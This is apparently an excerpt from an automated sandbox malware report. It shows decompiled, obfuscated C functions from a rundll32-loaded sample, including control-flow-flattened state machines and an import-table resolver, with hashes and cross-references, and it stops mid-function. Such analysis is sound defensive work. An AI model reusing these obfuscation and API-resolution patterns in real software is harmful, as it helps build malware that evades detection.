0x002099fa
0x002099fa
0x002099fa
0x00000000

Strings

&E, xrefs: 0020979F
D\, xrefs: 002098D6
M^, xrefs: 00209712

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &E$D\$M^
API String ID: 0-182273106
Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction ID: 315e421470210c57d1f8a73e91eb199e5ebfd5db1f911896dddb3b102de973cf
Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction Fuzzy Hash: 588174715183819FD358CF25C88981BBBF0BFD8354F50891CF196862A2D3B69A99CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0020153C, Relevance: 3.9, Strings: 3, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0020153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E0020E29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E00208697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E002060B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E002028CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
				} while (_t119 != 0x55f7722);
				goto L17;
			}

0x0020153c
0x00201546
0x00201550
0x00201558
0x0020155d
0x00201565
0x0020156d
0x00201575
0x0020157d
0x00201585
0x0020158d
0x00201595
0x0020159d
0x002015a5
0x002015ad
0x002015b5
0x002015ba
0x002015bf
0x002015c7
0x002015cf
0x002015d7
0x002015df
0x002015e7
0x002015ef
0x002015f7
0x002015ff
0x00201604
0x00201609
0x00201611
0x00201619
0x00201626
0x0020162a
0x0020162c
0x00201634
0x0020163c
0x00201644
0x0020164c
0x00201654
0x0020165c
0x0020166a
0x0020166d
0x00201675
0x00201679
0x0020167d
0x00201685
0x0020168d
0x00201695
0x0020169d
0x0020169d
0x002016af
0x0020176c
0x0020177c
0x0020177f
0x00201785
0x0020178e
0x0020179c
0x002016b5
0x002016bb
0x00201733
0x0020173b
0x00000000
0x002016bd
0x002016c3
0x00201715
0x0020171a
0x0020171e
0x00201720
0x00000000
0x00201720
0x002016c5
0x002016cb
0x002016f6
0x002016fb
0x00201700
0x00201706
0x00000000
0x00201706
0x002016cd
0x002016d3
0x00000000
0x002016d9
0x002016d9
0x00000000
0x002016d9
0x002016d3
0x002016cb
0x002016c3
0x002016bb
0x002017a0
0x002017ab
0x002017ab
0x00201757
0x00201759
0x0020175e
0x0020175e
0x00000000

Strings

i^%4, xrefs: 00201720
i^%4, xrefs: 002016C5
Wx, xrefs: 002015EF

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Wx$i^%4$i^%4
API String ID: 0-1584002782
Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction ID: ca2bdd9bc7a054a3455dc270b667a6a31dab68f651c92ffcc197b0c8cd1a73da
Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction Fuzzy Hash: 0A5157311183428FD398CE25C58942BFBE5BBC4758F140E1DF5AA962A1D7B4CA69CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00217D03, Relevance: 3.9, Strings: 3, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00217D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0x21ca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E00208736(_t119);
							 *0x21ca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E002059D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0x21ca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E00201132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0020E377);
					_t117 =  *0x21ca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}

0x00217d03
0x00217d06
0x00217d10
0x00217d18
0x00217d20
0x00217d30
0x00217d35
0x00217d3b
0x00217d40
0x00217d45
0x00217d52
0x00217d5f
0x00217d6c
0x00217d74
0x00217d7c
0x00217d84
0x00217d8c
0x00217d94
0x00217d9c
0x00217da4
0x00217db0
0x00217db5
0x00217dbb
0x00217dc3
0x00217dcb
0x00217dd0
0x00217dd8
0x00217de0
0x00217ded
0x00217dee
0x00217df2
0x00217dfa
0x00217e02
0x00217e0a
0x00217e12
0x00217e1a
0x00217e22
0x00217e2f
0x00217e33
0x00217e3b
0x00217e43
0x00217e48
0x00217e50
0x00217e58
0x00217e66
0x00217e6a
0x00217e72
0x00217e78
0x00217e78
0x00217e82
0x00217eb7
0x00217eb8
0x00217ebb
0x00217ec3
0x00217ec5
0x00217ecd
0x00217ecf
0x00000000
0x00217ecf
0x00217e84
0x00217e86
0x00000000
0x00217e88
0x00217e88
0x00217e96
0x00217e9b
0x00217ea1
0x00217ea4
0x00217ea6
0x00000000
0x00217ea6
0x00217e86
0x00000000
0x00217e82
0x00217ed3
0x00217ef1
0x00217ef6
0x00217efc
0x00217eff
0x00217f01
0x00217f04
0x00217f04
0x00217f0d
0x00217f1a

Strings

\v;8, xrefs: 00217D8C
sV, xrefs: 00217DC3
W:, xrefs: 00217E3B

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: W:$\v;8$sV
API String ID: 0-492820393
Opcode ID: c1b293f29d10c1c825a13dc1e8c07e618a92ce5be5defd84a973f4c7650530ba
Instruction ID: aa988910f20f20eaba34c83d1ae8248127669ccf4403e929148df632a2b97fdb
Opcode Fuzzy Hash: c1b293f29d10c1c825a13dc1e8c07e618a92ce5be5defd84a973f4c7650530ba
Instruction Fuzzy Hash: 2F51A8711183019FD318CF25D88A85BBBE1FBD8358F504A1DF4869A2A0D3B5CA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0020E05A, Relevance: 3.9, Strings: 3, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0020E05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E00214AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E00206228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}

0x0020e05a
0x0020e05d
0x0020e065
0x0020e075
0x0020e07b
0x0020e07f
0x0020e081
0x0020e089
0x0020e091
0x0020e099
0x0020e0a1
0x0020e0af
0x0020e0b4
0x0020e0ba
0x0020e0c2
0x0020e0ca
0x0020e0d2
0x0020e0da
0x0020e0de
0x0020e0e3
0x0020e0e9
0x0020e0f1
0x0020e0f9
0x0020e101
0x0020e106
0x0020e10e
0x0020e11b
0x0020e11e
0x0020e122
0x0020e127
0x0020e12f
0x0020e137
0x0020e144
0x0020e148
0x0020e150
0x0020e15d
0x0020e15e
0x0020e162
0x0020e16a
0x0020e172
0x0020e180
0x0020e184
0x0020e18c
0x0020e194
0x0020e198
0x0020e19e
0x0020e21c
0x00000000
0x0020e1a6
0x0020e1a6
0x0020e215
0x0020e215
0x0020e21a
0x00000000
0x00000000
0x0020e1c1
0x0020e1c3
0x0020e1c7
0x0020e1c9
0x0020e227
0x00000000
0x0020e227
0x0020e1d0
0x0020e1d2
0x0020e20c
0x0020e20c
0x0020e20e
0x0020e210
0x00000000
0x00000000
0x0020e1d6
0x0020e1e0
0x0020e1e0
0x0020e1d8
0x0020e1d8
0x0020e1d8
0x0020e1f4
0x0020e1f9
0x0020e1fc
0x0020e1fe
0x00000000
0x0020e200
0x0020e200
0x0020e204
0x0020e207
0x0020e209
0x0020e209
0x00000000
0x0020e209
0x0020e1fe
0x0020e212
0x0020e212
0x0020e212
0x00000000
0x0020e215

Strings

;)m, xrefs: 0020E05D
TB7f, xrefs: 0020E0DA
&L, xrefs: 0020E0F1

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &L$;)m$TB7f
API String ID: 0-1597752287
Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction ID: 5c633ed582a0a5838f49de66eaa2cddc4163309605c533ec94aa5a9c5693b6bc
Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction Fuzzy Hash: 195196B16083028FD718CF25C88591BFBE1FBD4358F104A1DF899962A1D374DA9ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 002161B8, Relevance: 3.8, Strings: 3, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E002161B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E00217F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E0020D64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}

0x002161b8
0x002161bb
0x002161ce
0x002161d2
0x002161d4
0x002161d9
0x002161db
0x002161e3
0x002161e8
0x002161f5
0x002161fd
0x00216205
0x0021620d
0x00216215
0x0021621d
0x00216225
0x00216229
0x0021622e
0x00216236
0x0021623e
0x00216246
0x0021624e
0x00216256
0x00216264
0x00216267
0x0021626b
0x00216270
0x00216275
0x0021627d
0x00216285
0x0021628d
0x00216295
0x0021629d
0x0021629d
0x002162ab
0x002162cb
0x00000000
0x002162ad
0x002162af
0x002162b9
0x002162ba
0x002162bf
0x002162c2
0x002162c7
0x00000000
0x002162c7
0x002162af
0x00000000
0x002162ab
0x002162df
0x002162e3
0x002162e8
0x002162eb
0x002162f0
0x002162f2
0x002162f2
0x00216303

Strings

(, xrefs: 00216205
]r, xrefs: 0021622E
x\d0, xrefs: 00216285

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ($]r$x\d0
API String ID: 0-3053701899
Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction ID: 9dd9aa7c59e75c750ddd897c6f9ec0cc0952d51276c754fe7941fc87dc1189d2
Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction Fuzzy Hash: BF3186B28083528FD304DE14D84945FBBE0BBE4718F004E5DF899A6261D379CE588B93

Uniqueness

Uniqueness Score: -1.00%

Function 00210B68, Relevance: 3.8, Strings: 3, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00210B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E0021889D(0x21c0b0, _v16,  *_t63);
				E0020C680(__ecx, _v40, _v20, 0x21c0b0, _v36, _a12, _t79, _a4);
				return E00212025(_v28, _t91, _v12, _v24);
			}

0x00210b70
0x00210b75
0x00210b78
0x00210b7b
0x00210b7c
0x00210b7d
0x00210b82
0x00210b92
0x00210b95
0x00210b9c
0x00210ba3
0x00210baa
0x00210bae
0x00210bb5
0x00210bbc
0x00210bc3
0x00210bca
0x00210bd1
0x00210bd8
0x00210bdf
0x00210be6
0x00210bed
0x00210bf4
0x00210bfb
0x00210c02
0x00210c09
0x00210c10
0x00210c17
0x00210c1e
0x00210c25
0x00210c2c
0x00210c33
0x00210c3a
0x00210c41
0x00210c48
0x00210c4c
0x00210c50
0x00210c57
0x00210c5e
0x00210c62
0x00210c69
0x00210c69
0x00210c70
0x00210c7e
0x00210c96
0x00210cb3

Strings

`h, xrefs: 00210B82
&S, xrefs: 00210C3A
hY, xrefs: 00210C02

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &S$`h$hY
API String ID: 0-860638928
Opcode ID: d8fcde644c02e16bb1d128cf7aed51bdff55f4165d2a533e4b862a24377cd582
Instruction ID: 70e8629f5556fdedcdbf59b8489388221d8a335c18bdc96fe6426d00a034b0ed
Opcode Fuzzy Hash: d8fcde644c02e16bb1d128cf7aed51bdff55f4165d2a533e4b862a24377cd582
Instruction Fuzzy Hash: B93121B1C00209EBDF49CFA1C94A8EEBFB5FF44314F208158E41276260D3B54A65CF95

Uniqueness

Uniqueness Score: -1.00%

Function 10033D2D, Relevance: 2.8, APIs: 1, Instructions: 1337COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 10033DC1

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 2c998c506e262c4253563a977a4d92619d14240c01dde0327c46d456d559eee2
Instruction ID: 0a7772f46e48d921beee7038d25414e7cf36a6fcd0ae478fc61cfa634bde4a5c
Opcode Fuzzy Hash: 2c998c506e262c4253563a977a4d92619d14240c01dde0327c46d456d559eee2
Instruction Fuzzy Hash: 2FC22D75E046298FDB66CE28DC807DAB7F5EB45346F1641EAD40DEB240EB34AE818F41

Uniqueness

Uniqueness Score: -1.00%

Function 00215A61, Relevance: 2.7, Strings: 2, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00215A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0020602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
